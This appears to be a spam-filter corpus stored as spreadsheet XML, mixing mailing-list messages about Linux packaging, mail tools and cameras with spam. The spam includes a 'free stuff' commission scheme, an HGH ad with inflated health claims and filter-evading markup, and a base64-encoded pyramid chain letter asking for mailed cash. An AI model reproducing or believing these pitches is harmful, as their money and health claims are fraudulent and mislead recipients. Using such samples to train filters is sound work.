 didn't change the false positive rate.  So you know whether src added
 additional power, or did you do both at once?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: http://apt.nixia.no/
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Peter wrote :
 &gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
 &gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
 &gt; &gt; at $ORKPLACE.
 &gt; 
 &gt; Olen ajatellut pystytt itselleni lokaalin apt-varaston, kun Suomesta ei
 &gt; tunnu lytyvn julkista peili. Osaisitko avittaa hiukan asiassa, eli 
 &gt; kuinka lhte liikkeelle? Ensin kannattanee peilata varsinainen RH:n
 &gt; rpm:t jostain, vaan mill softalla (rsync?) ja mist (funet?) tuo
 &gt; kannattaa tehd, ajatuksia?
 Wow, Finnish seems even more complicated than German to me :-)
 Could you send an English translation next time? I really didn't understand
 a thing and I assume I'm not the only one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</si>
  <si>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UK 'should ban nuclear arms'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,3,215/
 Date: 2002-10-03T04:21:04+01:00
 *UK latest:* The government should immediately announce that Britain will 
 abandon nuclear weapons when the Trident missile system is phased out, say a 
 group of eminent scientists.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MAKE MONEY GIVING AWAY FREE STUFF!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;FREESTORES - MAKE MONEY GIVING AWAY FREE STUFF!!!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .txtboxoffer {  font-family: arial; font-size: 12px; font-style: normal; font-weight: bold; color: 6A0002}
 .txt {  font-family: arial; font-size: 12px; font-style: normal; font-weight: normal; color: 000000}
 .titletxt {  font-family: arial; font-size: 14px; font-style: normal; font-weight: bold; color: F7201E}
 .textbott {  font-family: arial; font-size: 16px; font-style: normal; font-weight: bolder; color: #000033}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#cccccc" text="#000000"&gt;
 &lt;table width="550" border="0" cellspacing="0" cellpadding="0" height="609" align="center"&gt;
   &lt;tr&gt;
     &lt;td valign="top"&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" height="104"&gt;
         &lt;tr&gt;
           &lt;td width="296" height="126"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/header_1.gif" width="296" height="126" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td width="254" height="126"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/header_2.gif" width="254" height="126" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td width="296" height="101"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/header_3.gif" width="296" height="101" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td height="101" width="254"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/header_4.gif" width="254" height="101" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" height="104"&gt;
         &lt;tr&gt;
           &lt;td width="55" height="126"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="55" height="10" border="0"&gt;&lt;/td&gt;
           &lt;td height="126" valign="top" width="453"&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr&gt;
                 &lt;td width="6" bgcolor="#ffffff"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="6" height="6" border="0"&gt;&lt;/td&gt;
                 &lt;td&gt;
                   &lt;table width="467" border="0" cellspacing="0" cellpadding="0" height="307"&gt;
                     &lt;tr&gt;
                       &lt;td width="332" bgcolor="#ffffff" valign="top"&gt;
                         &lt;table width="306" border="0" cellspacing="0" cellpadding="6" height="218"&gt;
                           &lt;tr&gt;
                             &lt;td width="273"&gt;
                               &lt;p&gt;&lt;strong&gt;&lt;span class="titletxt"&gt;Make Money With
                                 Your Own Free Stuff Website!&lt;/span&gt;&lt;br&gt;
                                 &lt;/strong&gt;&lt;font class="txt"
                               color=#000000&gt;Get Your Own Free Stuff
                                 Website. With FREEstores.biz, there is no need
                                 to learn any programming skills. Your store is
                                 automatically set up for you. Of course, you are
                                 welcome to customize your store using the tools
                                 offered in the Owner's Back Office. Optional customization
                                 includes adding your own logo and changing color
                                 schemes. You may also add as many as 5 stores
                                 to your account at no additional charge!&lt;/font&gt;&lt;/p&gt;
                               &lt;p&gt;&lt;span class="titletxt"&gt;Access to hundreds of
                                 Free products!&lt;/span&gt;&lt;br&gt;
                                 &lt;font class="txt"&gt;FREEstores.biz is always on
                                 the lookout for new Free products to add to the
                                 warehouse. Every time a new product is located,
                                 it is automatically added to your store in the
                                 appropriate category. When your customers order
                                 products, they are shipped from our warehouse
                                 directly to your customers. There is no inventory
                                 for you to manage - ever!&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
                             &lt;td width="9"&gt; &lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/td&gt;
                       &lt;td valign="top" bgcolor="#ffffff"&gt;
                         &lt;table width="116" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
                           &lt;tr&gt;
                             &lt;td colspan="3" height="28" bgcolor="#fe0000"&gt;
                               &lt;p&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/square_offer.gif" width="161" height="139" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
                             &lt;/td&gt;
                           &lt;/tr&gt;
                           &lt;tr&gt;
                             &lt;td colspan="3" bgcolor="#fe0000"&gt;
                               &lt;div align="center" class="txtboxoffer"&gt;Act now
                                 and receive&lt;br&gt;
                                 a brand-new 1.2 Ghz&lt;br&gt;
                                 Gateway Computer&lt;/div&gt;
                             &lt;/td&gt;
                           &lt;/tr&gt;
                           &lt;tr&gt;
                             &lt;td width="23" height="28" valign="top"&gt;
                               &lt;div align="center"&gt;&lt;img src="http://www.expro.biz/adfree/img/corner_left_offer.gif" width="23" height="28" border="0"&gt;&lt;/div&gt;
                             &lt;/td&gt;
                             &lt;td width="113" bgcolor="#fe0000" height="28"
                            &gt;&lt;/td&gt;
                             &lt;td width="25" height="28"&gt;&lt;img src="http://www.expro.biz/adfree/img/corner_right_offer.gif" width="25" height="28" border="0"&gt;&lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                         &lt;p&gt; &lt;/p&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td colspan="2" bgcolor="#ffffff" valign="top"&gt;
                         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
                           &lt;tr&gt;
                             &lt;td valign="top" width="228"&gt;
                               &lt;table width="225" border="0" cellspacing="0" cellpadding="6"&gt;
                                 &lt;tr&gt;
                                   &lt;td width="213" valign="top"&gt;
                                     &lt;p&gt;&lt;strong&gt;&lt;font color=#000066 face="Arial, Helvetica, sans-serif" size=4&gt;&lt;b&gt;&lt;span class="titletxt"&gt;Monthly
                                       Commissions!&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/strong&gt;&lt;span class="titletxt"&gt;&lt;font face="Arial, Helvetica, sans-serif" size=2&gt;&lt;/font&gt;&lt;/span&gt;&lt;font face="Arial, Helvetica, sans-serif" size=2&gt;&lt;br&gt;
                                       &lt;/font&gt;&lt;font
       color=#000066 class="txt"&gt;You earn &lt;strong&gt;&lt;font
       class=small-green&gt;$3&lt;/font&gt;&lt;/strong&gt; for every Free item ordered by your
                                       customers. In your Back Office, you have
                                       access to statistics which will tell you
                                       exactly how many customers you had in your
                                       store each day, how many items were purchased,
                                       and most importantly, how much commission
                                       you earned!&lt;/font&gt;&lt;/p&gt;
                                     &lt;/td&gt;
                                 &lt;/tr&gt;
                               &lt;/table&gt;
                             &lt;/td&gt;
                             &lt;td width="247" valign="top"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/star.gif" width="227" height="127" border="0"&gt;&lt;/a&gt;&lt;br&gt;
                             &lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width="6" bgcolor="#ffffff"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="6" height="6" border="0"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td height="126" valign="top" width="16"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="16" height="10" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td width="55"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="55" height="10" border="0"&gt;&lt;/td&gt;
           &lt;td&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr&gt;
                 &lt;td height="39" rowspan="2" width="20"&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=KQQWKLEYJQPM&amp;ext=1"&gt;&lt;img src="http://www.expro.biz/adfree/img/bott_left.gif" width="21" height="39" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td bgcolor="#10adce" height="34" class="textbott"&gt;
                   &lt;div align="center"&gt;TRUE MAKE MONEY WHILE YOU SLEEP BUSINESS!&lt;/div&gt;
                 &lt;/td&gt;
                 &lt;td height="39" rowspan="2" width="20"&gt;&lt;img src="http://www.expro.biz/adfree/img/bott_right.gif" width="20" height="39" border="0"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;
                 &lt;td bgcolor="#ffffff" height="5"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="5" height="5" border="0"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td width="16"&gt;&lt;img src="http://www.expro.biz/adfree/img/spacer.gif" width="16" height="10" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt; &lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=KQQWKLEYJQPM"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</si>
  <si>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yyyy,Wish you looked and felt younger -HGH
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@netnoteinc.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;br&gt;are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;&lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
 Our Web Site and Learn The Facts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;div align="center"&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;You are receiving this email as a subscr&lt;!--yyyy--&gt;iber&lt;br&gt;to the Opt&lt;!----&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://211.99.37.206:81/ultimatehgh_run/remove.php?userid=jm@netnoteinc.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Boston Globe on Linux and OS X
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000204.html
 Date: 2002-09-30T20:42:06-08:00
 An article titled Mac poses as much of challenge to Linux as to Windows is both 
 insightful and missing the point. The general thrust of the article, is 
 dead-on. It's just the sort of stuff I've been saying to folks...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Stripping the SpamAssassin report
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:
 &gt; Ah...  You learn something new every day!  This would make things 
 &gt; quite a bit easier.  I assume it can handle a mailbox full of mail to 
 &gt; report rather than a single piece of spam from STDIN.  I'll check the 
 &gt; docs on that though.
 Unfortunately not, it's a one at a time thing.  If it would help
 you, I have a script that I use which handles a mbox file at a time,
 strips the SA stuff, reports to razor, and can then do things like
 open relay checks, reports to spamcop, etc.  It's available via:
 http://www.kluge.net/~felicity/random/handlespam.txt
 :)
 -- 
 Randomly Generated Tagline:
 "But you have to allow a little for the desire to evangelize when you
  think you have good news."         - Larry Wall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</si>
  <si>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Re: [ILUG] Digital Cameras
</t>
  </si>
  <si>
    <t xml:space="preserve">If it has a usb cable it'll more than likely work. You just plug it in, load 
 the right modules and mount the camera as another device. You should eject 
 the device after unmounting just to be kind to the camera..
 Do a google search and you'll find plenty of info.
 Donncha.
 On Friday 09 August 2002 14:59, Satelle, StevenX wrote:
 &gt; Has anyone had any experience with using a digital camera with Linux, I'm
 &gt; thinking of buying one. The camera will definitely be a HP camera (Since I
 &gt; work for them and get a company discount) either a photosmart 318 or a
 &gt; photosmart 120 and I would prefer to know before I buy if I can get it to
 &gt; work or not
 &gt;
 &gt; Steven Satelle
 &gt; TAC
 &gt; i606 4372
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Lance wrote:
 &gt;Make sure you rebuild as root and you're in the directory that you
 &gt;downloaded the file.  Also it might complain of a few dependencies but
 &gt;you can get these at freshrpms.net, except for gcc3, which you can find
 &gt;on your Red Hat cd, Red Hat ftp, or rpmfind.net.
 &gt;
 &gt;After you rebuild the source rpm it should install a binary rpm in
 &gt;/usr/src/redhat/RPMS/i386.  With all dependencies met, install mplayer
 &gt;with 'rpm -ivh mplayer-20020106-fr1.rpm' and you should be good to go.
 &gt;
 &gt;One last thing, you will need the win32 codecs, I found them on google,
 &gt;create a directory /usr/lib/win32 and place the codecs in there.
 &gt;
 &gt;Good Luck!
 &gt;
 &gt;Lance
 &gt;
  I dl'd gcc3 and libgcc3, but I still get the same error message when I 
 try rpm --rebuild or recompile. I do this as root, I dl'd as root also.
 thanks for the help, any more idea what's going on?
 &gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;         I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
 &gt;&gt;then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;_______________________________________________
 &gt;RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt;http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt;
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello !                                                                     097-3
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A6_65D74A6D.D6752B68
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVsbG8gIQ0KDQoNCg0KDQoNCg0KDQoNCg0KPT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT0NCkludmVzdG1lbnQgaW4gdGVjaG5v
 bG9neSB0aGF0IHdpbGwgbWFrZSB5b3UgbW9uZXkuDQo9PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIA0KQVMgU0VFTiBPTiBO
 QVRJT05BTCBUVjoNCiANCk1ha2luZyBvdmVyIGhhbGYgbWlsbGlvbiBkb2xs
 YXJzIGV2ZXJ5IDQgdG8gNSBtb250aHMgZnJvbSB5b3VyIGhvbWU/IEEgb25l
 IHRpbWUNCmludmVzdG1lbnQgb2Ygb25seSAkMjUgVS5TLiBEb2xsYXJzIGxl
 dCdzIGdldCB5b3Ugb24gdGhlIHJvYWQgdG8gZmluYW5jaWFsIHN1Y2Nlc3Mu
 DQogDQpBTEwgVEhBTktTIFRPIFRIRSBDT01QVVRFUiBBR0UgQU5EIFRIRSBJ
 TlRFUk5FVCAhDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09DQpCRSBBIE1JTExJT05BSVJFIExJS0UgT1RIRVJTIFdJVEhJ
 TiBBIFlFQVIhISENCiANCkJlZm9yZSB5b3Ugc2F5ICcnQnVsbCcnLCBwbGVh
 c2UgcmVhZCB0aGUgZm9sbG93aW5nLiBUaGlzIGlzIHRoZSBsZXR0ZXIgeW91
 IGhhdmUgYmVlbg0KaGVhcmluZyBhYm91dCBvbiB0aGUgbmV3cyBsYXRlbHku
 IER1ZSB0byB0aGUgcG9wdWxhcml0eSBvZiB0aGlzIGxldHRlciBvbiB0aGUg
 SW50ZXJuZXQsDQphIG5hdGlvbmFsIHdlZWtseSBuZXdzIHByb2dyYW0gcmVj
 ZW50bHkgZGV2b3RlZCBhbiBlbnRpcmUgc2hvdyB0byB0aGUgaW52ZXN0aWdh
 dGlvbg0Kb2YgdGhpcyBwcm9ncmFtIGRlc2NyaWJlZCBiZWxvdywgdG8gc2Vl
 IGlmIGl0IHJlYWxseSBjYW4gbWFrZSBwZW9wbGUgbW9uZXkuIFRoZQ0Kc2hv
 dyBhbHNvIGludmVzdGlnYXRlZCB3aGV0aGVyIG9yIG5vdCB0aGUgcHJvZ3Jh
 bSB3YXMgbGVnYWwuDQogDQpUaGVpciBmaW5kaW5ncyBwcm92ZWQgb25jZSBh
 bmQgZm9yIGFsbCB0aGF0IHRoZXJlIGFyZSAnJ2Fic29sdXRlbHkgTk8gTGF3
 cyBwcm9oaWJpdGluZw0KdGhlIHBhcnRpY2lwYXRpb24gaW4gdGhlIHByb2dy
 YW0gYW5kIGlmIHBlb3BsZSBjYW4gZm9sbG93IHRoZSBzaW1wbGUgaW5zdHJ1
 Y3Rpb25zLA0KdGhleSBhcmUgYm91bmQgdG8gbWFrZSBzb21lIG1lZ2EgYnVj
 a3Mgd2l0aCBvbmx5JDI1IG91dCBvZiBwb2NrZXQgY29zdCcnLg0KRFVFIFRP
 IFRIRSBSRUNFTlQgSU5DUkVBU0UgT0YgUE9QVUxBUklUWSAmIFJFU1BFQ1Qg
 VEhJUw0KUFJPR1JBTSBIQVMgQVRUQUlORUQsIElUIElTIENVUlJFTlRMWSBX
 T1JLSU5HIEJFVFRFUiBUSEFOIEVWRVIuDQogDQpUaGlzIGlzIHdoYXQgb25l
 IGhhZCB0byBzYXk6ICcnVGhhbmtzIHRvIHRoaXMgcHJvZml0YWJsZSBvcHBv
 cnR1bml0eS4gSSB3YXMgYXBwcm9hY2hlZA0KbWFueSB0aW1lcyBiZWZvcmUg
 YnV0IGVhY2ggdGltZSBJIHBhc3NlZCBvbiBpdC4gSSBhbSBzbyBnbGFkIEkg
 ZmluYWxseSBqb2luZWQganVzdCB0byBzZWUNCndoYXQgb25lIGNvdWxkIGV4
 cGVjdCBpbiByZXR1cm4gZm9yIHRoZSBtaW5pbWFsIGVmZm9ydCBhbmQgbW9u
 ZXkgcmVxdWlyZWQuIFRvIG15DQphc3RvbmlzaG1lbnQsIEkgcmVjZWl2ZWQg
 YSB0b3RhbCBvZiAkNjEwLDQ3MC4wMCBpbiAyMSB3ZWVrcywgd2l0aCBtb25l
 eSBzdGlsbCBjb21pbmcgaW4uDQoiUGFtIEhlZGxhbmQsIEZvcnQgTGVlLCBO
 ZXcgSmVyc2V5Lg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT0NCiANCkhlcmUgaXMgYW5vdGhlciB0ZXN0aW1vbmlhbDog
 IlRoaXMgcHJvZ3JhbSBoYXMgYmVlbiBhcm91bmQgZm9yIGEgbG9uZyB0aW1l
 IGJ1dCBJIG5ldmVyDQpiZWxpZXZlZCBpbiBpdC4gQnV0IG9uZSBkYXkgd2hl
 biBJIHJlY2VpdmVkIHRoaXMgYWdhaW4gaW4gdGhlIG1haWwgSSBkZWNpZGVk
 IHRvIGdhbWJsZQ0KbXkgJDI1IG9uIGl0LiBJIGZvbGxvd2VkIHRoZSBzaW1w
 bGUgaW5zdHJ1Y3Rpb25zIGFuZCB2b2lsYSAuLi4uLiAzIHdlZWtzIGxhdGVy
 IHRoZSBtb25leQ0Kc3RhcnRlZCB0byBjb21lIGluLiBGaXJzdCBtb250aCBJ
 IG9ubHkgbWFkZSAkMjQwLjAwIGJ1dCB0aGUgbmV4dCAyIG1vbnRocyBhZnRl
 ciB0aGF0DQpJIG1hZGUgYSB0b3RhbCBvZiAkMjkwLDAwMC4wMC4gU28gZmFy
 LCBpbiB0aGUgcGFzdCA4IG1vbnRocyBieSByZS1lbnRlcmluZyB0aGUgcHJv
 Z3JhbSwNCkkgaGF2ZSBtYWRlIG92ZXIgJDcxMCwwMDAuMDAgYW5kIEkgYW0g
 cGxheWluZyBpdCBhZ2Fpbi4gVGhlIGtleSB0byBzdWNjZXNzIGluIHRoaXMN
 CnByb2dyYW0gaXMgdG8gZm9sbG93IHRoZSBzaW1wbGUgc3RlcHMgYW5kIE5P
 VCBjaGFuZ2UgYW55dGhpbmcuJycNCk1vcmUgdGVzdGltb25pYWxzIGxhdGVy
 IGJ1dCBmaXJzdCwNCiANCj1QUklOVCBUSElTIE5PVyBGT1IgWU9VUiBGVVRV
 UkUgUkVGRVJFTkNFPQ0KIA0KJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQNCklmIHlv
 dSB3b3VsZCBsaWtlIHRvIG1ha2UgYXQgbGVhc3QgJDUwMCwwMDAgZXZlcnkg
 NCB0byA1IG1vbnRocyBlYXNpbHkgYW5kIGNvbWZvcnRhYmx5LA0KcGxlYXNl
 IHJlYWQgdGhlIGZvbGxvd2luZy4uLi4uLi4uLi4uLi4uLi4uVEhFTiBSRUFE
 IElUIEFHQUlOIGFuZCBBR0FJTiEhIQ0KJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQN
 CiANCkZPTExPVyBUSEUgU0lNUExFIElOU1RSVUNUSU9OIEJFTE9XIEFORCBZ
 T1VSIEZJTkFOQ0lBTCBEUkVBTVMNCldJTEwgQ09NRSBUUlVFLCBHVUFSQU5U
 RUVEISBJTlNUUlVDVElPTlM6DQogDQo9PT09PU9yZGVyIGFsbCA1IHJlcG9y
 dHMgc2hvd24gb24gdGhlIGxpc3QgYmVsb3cgPT09PT0NCiANCkZvciBlYWNo
 IHJlcG9ydCwgc2VuZCAkNSBDQVNILCBUSEUgTkFNRSAmIE5VTUJFUiBPRiBU
 SEUgUkVQT1JUIFlPVQ0KQVJFIE9SREVSSU5HIGFuZCBZT1VSIEUtTUFJTCBB
 RERSRVNTIHRvIHRoZSBwZXJzb24gd2hvc2UgbmFtZSBhcHBlYXJzDQpPTiBU
 SEFUIExJU1QgbmV4dCB0byB0aGUgcmVwb3J0LiBNQUtFIFNVUkUgWU9VUiBS
 RVRVUk4gQUREUkVTUyBJUyBPTg0KWU9VUiBFTlZFTE9QRSBUT1AgTEVGVCBD
 T1JORVIgaW4gY2FzZSBvZiBhbnkgbWFpbCBwcm9ibGVtcy4NCiANCj09PSBX
 aGVuIHlvdSBwbGFjZSB5b3VyIG9yZGVyLCBtYWtlIHN1cmUgeW91IG9yZGVy
 IGVhY2ggb2YgdGhlIDUgcmVwb3J0cy4gWW91IHdpbGwNCm5lZWQgYWxsIDUg
 cmVwb3J0cyBzbyB0aGF0IHlvdSBjYW4gc2F2ZSB0aGVtIG9uIHlvdXIgY29t
 cHV0ZXIgYW5kIHJlc2VsbCB0aGVtLg0KWU9VUiBUT1RBTCBDT1NUICQ1IFgg
 NT0kMjUuMDAuDQogDQpXaXRoaW4gYSBmZXcgZGF5cyB5b3Ugd2lsbCByZWNl
 aXZlLCB2aWUgZS1tYWlsLCBlYWNoIG9mIHRoZSA1IHJlcG9ydHMgZnJvbSB0
 aGVzZSA1IGRpZmZlcmVudA0KaW5kaXZpZHVhbHMuIFNhdmUgdGhlbSBvbiB5
 b3VyIGNvbXB1dGVyIHNvIHRoZXkgd2lsbCBiZSBhY2Nlc3NpYmxlIGZvciB5
 b3UgdG8gc2VuZCB0bw0KdGhlIDEsMDAwJ3Mgb2YgcGVvcGxlIHdobyB3aWxs
 IG9yZGVyIHRoZW0gZnJvbSB5b3UuIEFsc28gbWFrZSBhIGZsb3BweSBvZiB0
 aGVzZSByZXBvcnRzDQphbmQga2VlcCB0aGVtIG9uIHlvdXIgZGVzayBpbiBj
 YXNlIHNvbWV0aGluZyBoYXBwZW5zIHRvIHlvdXIgY29tcHV0ZXIuDQogDQpJ
 TVBPUlRBTlQgLSBETyBOT1QgYWx0ZXIgdGhlIG5hbWVzIG9mIHRoZSBwZW9w
 bGUgd2hvIGFyZSBsaXN0ZWQgbmV4dCB0byBlYWNoIHJlcG9ydCwNCm9yIHRo
 ZWlyIHNlcXVlbmNlIG9uIHRoZSBsaXN0LCBpbiBhbnkgd2F5IG90aGVyIHRo
 YW4gd2hhdCBpcyBpbnN0cnVjdGVkIGJlbG93IGluIHN0ZXANCicnIDEgdGhy
 b3VnaCA2ICcnIG9yIHlvdSB3aWxsIGxvb3NlIG91dCBvbiBtYWpvcml0eSBv
 ZiB5b3VyIHByb2ZpdHMuIE9uY2UgeW91IHVuZGVyc3RhbmQgdGhlIHdheQ0K
 dGhpcyB3b3JrcywgeW91IHdpbGwgYWxzbyBzZWUgaG93IGl0IGRvZXMgbm90
 IHdvcmsgaWYgeW91IGNoYW5nZSBpdC4gUmVtZW1iZXIsIHRoaXMgbWV0aG9k
 DQpoYXMgYmVlbiB0ZXN0ZWQsIGFuZCBpZiB5b3UgYWx0ZXIsIGl0IHdpbGwg
 Tk9UIHdvcmsgISEhIFBlb3BsZSBoYXZlIHRyaWVkIHRvIHB1dCB0aGVpcg0K
 ZnJpZW5kcy9yZWxhdGl2ZXMgbmFtZXMgb24gYWxsIGZpdmUgdGhpbmtpbmcg
 dGhleSBjb3VsZCBnZXQgYWxsIHRoZSBtb25leS4gQnV0IGl0IGRvZXMgbm90
 IHdvcmsNCnRoaXMgd2F5LiBCZWxpZXZlIHVzLCB3ZSBhbGwgaGF2ZSB0cmll
 ZCB0byBiZSBncmVlZHkgYW5kIHRoZW4gbm90aGluZyBoYXBwZW5lZC4gU28g
 RG8gTm90DQp0cnkgdG8gY2hhbmdlIGFueXRoaW5nIG90aGVyIHRoYW4gd2hh
 dCBpcyBpbnN0cnVjdGVkLiBCZWNhdXNlIGlmIHlvdSBkbywgaXQgd2lsbCBu
 b3Qgd29yayBmb3IgeW91Lg0KIA0KUmVtZW1iZXIsIGhvbmVzdHkgcmVhcHMg
